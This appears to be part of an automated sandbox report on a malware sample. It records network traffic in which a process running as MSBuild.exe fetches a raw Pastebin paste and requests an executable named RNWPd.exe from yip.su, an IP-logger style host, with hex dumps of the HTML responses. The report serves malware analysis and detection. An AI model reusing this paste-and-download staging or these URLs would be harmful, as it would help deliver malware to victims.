                    Sep 16, 2024 21:24:09.702759027 CEST1.1.1.1192.168.2.60x34ddNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                    • pastebin.com
                    • yip.su
                    • iplogger.com
                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                    Sep 16, 2024 21:21:10.921356916 CEST104.20.4.235443192.168.2.649735CN=pastebin.com CN=WE1, O=Google Trust Services, C=US CN=GTS Root R4, O=Google Trust Services LLC, C=USCN=WE1, O=Google Trust Services, C=US CN=GTS Root R4, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEMon Aug 12 02:59:26 CEST 2024 Wed Dec 13 10:00:00 CET 2023 Wed Nov 15 04:43:21 CET 2023Sun Nov 10 01:59:25 CET 2024 Tue Feb 20 15:00:00 CET 2029 Fri Jan 28 01:00:42 CET 2028771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,03b5074b1b5d032e5620f69f9f700ff0e
                    CN=WE1, O=Google Trust Services, C=USCN=GTS Root R4, O=Google Trust Services LLC, C=USWed Dec 13 10:00:00 CET 2023Tue Feb 20 15:00:00 CET 2029
                    CN=GTS Root R4, O=Google Trust Services LLC, C=USCN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEWed Nov 15 04:43:21 CET 2023Fri Jan 28 01:00:42 CET 2028
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.649713104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:10 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:20:10 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:20:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c433657797a42b3-EWR
                    2024-09-16 19:20:10 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:20:10 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:20:10 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:20:10 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:20:10 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.649716188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:11 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:20:11 UTC904INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:20:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:20:11 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:20:11 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=asZnoj7RL3AbeCsAXFtW94C1FUOUx7WZxaBGvmg%2BPfYYy8gincM%2FEK5LYz0XIsCLDZHvLaMVth2WAuzs3oo05Yon6CYUXoqtPW%2BLzR%2FP9yG35Nu4ehSXc%2FY%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c43365e09350ca0-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:20:11 UTC465INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
                    2024-09-16 19:20:11 UTC1369INData Raw: 74 2d 61 66 74 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 37 20 64 61 79 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 65 6e 65 72 2c 20 69 70 6c 6f 67 67 65 72 2c 20 73 68 6f 72 74 6c 69 6e 6b 2c 20 75 72 6c 2c 20 64 6f 6d 61 69 6e 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 0a 09 3c 6d 65 74 61 20 70 72 6f
                    Data Ascii: t-after" content="7 days" /><meta name="keywords" content="shortener, iplogger, shortlink, url, domain" /><meta name="description" content="" /><link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" /><meta pro
                    2024-09-16 19:20:11 UTC1369INData Raw: 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 33 38 62 64 39 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 32 35 70 78 20 35 70 78 20 30 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 61 6e 69 6d 61 74 69 6f 6e 3a 6a 75 6d 70 20 31 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 32 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 3b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 30 2e 32 73 7d 23 6c 6f 61 64 65 72 3e 73 70 61 6e 3a 6e 74 68 2d 63 68 69 6c 64 28 33 29 7b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65
                    Data Ascii: und-color:#338bd9;display:inline-block;margin:25px 5px 0;-webkit-animation:jump 1s linear infinite;animation:jump 1s linear infinite}#loader>span:nth-child(2){-webkit-animation-delay:0.2s;animation-delay:0.2s}#loader>span:nth-child(3){-webkit-animation-de
                    2024-09-16 19:20:11 UTC1369INData Raw: 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 70 6c 61 74 66 6f 72 6d 3d 3d 3d 27 57 69 6e 64 6f 77 73 27 29 7b 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 44 61 74 61 2e 67 65 74 48 69 67 68 45 6e 74 72 6f 70 79 56 61 6c 75 65 73 28 5b 27 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 27 5d 29 2e 74 68 65 6e 28 75 61 3d 3e 7b 5f 70 3d 70 61 72 73 65 49 6e 74 28 75 61 2e 70 6c 61 74 66 6f 72 6d 56 65 72 73 69 6f 6e 2e 73 70 6c 69 74 28 27 2e 27 29 5b 30 5d 29 7d 29 7d 0a 09 76 61 72 20 5f 79 3d 5b 5d 2c 5f 7a 3d 7b 7d 2c 5f 78 3d 66 75 6e 63 74 69 6f 6e 28 6e 61 6d 65 2c 64 61 74 61 2c 6e 29 7b 69 66 28 74 79 70 65 6f 66 28 64 61 74 61 29 21 3d 3d 27 6f 62 6a 65 63 74 27 29 7b 64 61 74 61 3d 7b 7d 7d 3b 6e 3d 5f 79 2e 69 6e 64 65 78 4f 66 28 6e
                    Data Ascii: .userAgentData.platform==='Windows'){navigator.userAgentData.getHighEntropyValues(['platformVersion']).then(ua=>{_p=parseInt(ua.platformVersion.split('.')[0])})}var _y=[],_z={},_x=function(name,data,n){if(typeof(data)!=='object'){data={}};n=_y.indexOf(n
                    2024-09-16 19:20:11 UTC1369INData Raw: 3e 0a 0a 3c 73 74 79 6c 65 3e 0a 2e 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 34 34 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 33 32 30 70 78 3b 68 65 69 67 68 74 3a 33 35 30 70 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6c 65 78 2d 77 72 61 70 3a 77 72 61 70 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 62 6f 72
                    Data Ascii: ><style>.wrapper{margin-top:100px}.container{width:440px;min-width:320px;height:350px;display:-ms-flexbox;display:flex;-ms-flex-align:center;align-items:center;-ms-flex-pack:center;justify-content:center;text-align:center;flex-wrap:wrap;margin:auto;bor
                    2024-09-16 19:20:11 UTC1369INData Raw: 33 31 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 6c 6f 67 6f 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23 30 37 34 64 37 63 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 70 65 72 22 3e 0a 0a 20 20 20 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 64 6f 6d 61 69 6e 22 3e 0a 09 09 09 09 3c 64 69 76 20
                    Data Ascii: 31px;margin:auto}.logo .logo-text{color:#074d7c;text-align:center;font-size:12px;white-space:nowrap;font-family:arial;font-weight:700}</style><div class="wrapper"> <div class="container"> <div class="header"><div class="domain"><div
                    2024-09-16 19:20:11 UTC160INData Raw: 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 27 61 62 73 6f 6c 75 74 65 27 2c 61 2e 73 74 79 6c 65 2e 74 6f 70 3d 69 2c 61 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 69 2c 61 2e 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 27 2b 75 72 6c 2e 6a 6f 69 6e 28 27 3b 27 29 2c 64 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 0a 09 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                    Data Ascii: .style.position='absolute',a.style.top=i,a.style.left=i,a.src='https://counter.yadro.ru/hit?'+url.join(';'),d.body.appendChild(a);</script></body></html>
                    2024-09-16 19:20:11 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.649719104.20.4.2354431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:16 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2024-09-16 19:20:16 UTC222INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:20:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    X-Frame-Options: SAMEORIGIN
                    Server: cloudflare
                    CF-RAY: 8c43367e59517cac-EWR
                    2024-09-16 19:20:16 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                    2024-09-16 19:20:16 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                    2024-09-16 19:20:16 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                    2024-09-16 19:20:16 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                    2024-09-16 19:20:16 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.649722188.114.97.34431340C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                    TimestampBytes transferredDirectionData
                    2024-09-16 19:20:17 UTC65OUTGET /RNWPd.exe HTTP/1.1
                    Host: yip.su
                    Connection: Keep-Alive
                    2024-09-16 19:20:18 UTC900INHTTP/1.1 200 OK
                    Date: Mon, 16 Sep 2024 19:20:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: close
                    memory: 0.36197662353515625
                    expires: Mon, 16 Sep 2024 19:20:18 +0000
                    strict-transport-security: max-age=604800
                    strict-transport-security: max-age=31536000
                    content-security-policy: img-src https: data:; upgrade-insecure-requests
                    x-frame-options: SAMEORIGIN
                    Cache-Control: max-age=14400
                    CF-Cache-Status: EXPIRED
                    Last-Modified: Mon, 16 Sep 2024 19:20:18 GMT
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iitt5OgmyHHDz8EotH44DE4bdNSmZhlP8OtHR24vC%2Bhcf43GvarKoJqEvT5%2FLakjf7rYcXOK1Fz5gjG7E3TXUEbTp3w4IfY8liHL%2BiuCcZZquZAqnCTsagQ%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8c43368949ac8c48-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-09-16 19:20:18 UTC469INData Raw: 31 64 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c
                    Data Ascii: 1d26<!DOCTYPE html><html lang="" class="html"><head><title></title><meta http-equiv="content-type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width,
